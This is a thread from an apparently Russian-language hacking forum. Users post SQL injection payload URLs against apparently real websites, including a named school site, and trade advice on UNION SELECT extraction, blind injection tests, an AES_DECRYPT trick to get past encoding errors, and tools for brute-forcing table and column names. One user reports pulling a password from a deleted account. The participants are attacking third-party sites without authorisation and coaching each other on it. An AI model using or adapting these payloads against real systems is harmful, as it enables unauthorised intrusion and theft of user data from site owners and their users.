Ваши вопросы по уязвимостям.

сканер показал что найдена папка cgi-bin и cgi-bin/formmail.pl, пробовал в браузере зайти на них пишет что таких страниц не существует, как понимать?

 

VentRu
Если это тот сайт о котором я думаю,то не советую

 

VentRu, думаю не стоит трогать этот сайт ))

jokester, опередил)))))

 

Вы правильно думаете. Я в принципе спрашиваю. Насколько понимаю, возможна))

 

2 VentRu
А почему бы и нет ? Конечно, возможно

 

Code:

http://hosted-forum.com/active_members.php?cat=-1+UNION+SELECT+1,version(),3/*

помогите дальше двинуться)

 

где ты тут нашел sql ? )


ща проверил,скуля есть, вчера не было )))))
видать сервак глючил или админ....

 

Вчера смотрел, они с базой какие-то работы проводили.

 

http://www.tammiku.edu.ee/arhiv/06-07.php?month=1&year='

Ншёл сканер скулю. Сколько ни мудилсо, ниче вывести не смог ))).При запросе из баз выводит форбидден:Р. Зато запросы вида 1'+and+'2'='1&year=2008 пашут.Почему именно столько кавычек я хз.Есть подозрения, что для двойки две кавычки потому, что ид соответствует строковая переменная. Запоролся в общем йа : )(Это уже Blind sql inj).

 

http:/www.tammiku.edu.ee/arhiv/06-07.php?month=4'+and+'1'='0&year=2008

Шо тут гадать то:Р

 

http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,3,4,5,6,7/*
работает,

то на странице отображается 3 и 5

но когда хочу поставить version() то не работает ..
http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,version(),4,5,6,7/*
выдаёт ошибку
как надо сделать ?

 

короче нашёл

http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),6,7/*

работает, что я могу дальше ?

 

nicusor version() ?

 

mysql : 4.1.14

 

можно таблицы подобрать. руками или моим скриптом/прогой от SQL

 

Народ, естьу кого прога для перебора таблиц и колонок?)). Я так вручную заебусь перебирать.через браузер)) (1462 символа :РР).Есь скуля инж тул, но я хз как ей перебирать - какие-то пост параметры )

 

я не понял, тебе нужен подбор таблиц или количества выводимых полей?

 

перебор таблиц и колонок м мс скуля сервер:РР.Руками заебалсо уже.И ещё вот при отображении вывелась ошибка :

ADODB.Field ошибка '800a0bcd'

BOF èëè EOF èìååò çíà÷åíèå True, ëèáî òåêóùàÿ çàïèñü óäàëåíà. Äëÿ âûïîëíÿåìîé îïåðàöèè òðåáóåòñÿ òåêóùàÿ çàïèñü.

/item.asp, line 13

EOF обозначает конец файла как я помню, а что тут нипонятно)).Ещё и каракули стоят)).Есь какой-нить способ обойти кодировку,а то аес не пашет )

прочитал вот,и узнал,что эт знач юзера удалили))).Но пароль егр почему-то есть,а юзерид и ид_юзер выдают эту ошибку с концом файла)).И чтойто значит?

 

мм, это значит, что по твоему sql запросу не получено не каких данных, насчет аес? это T-SQL, там нет aes_decrypt

 

Че делать то.....логина нет,а пароль есь? гггг))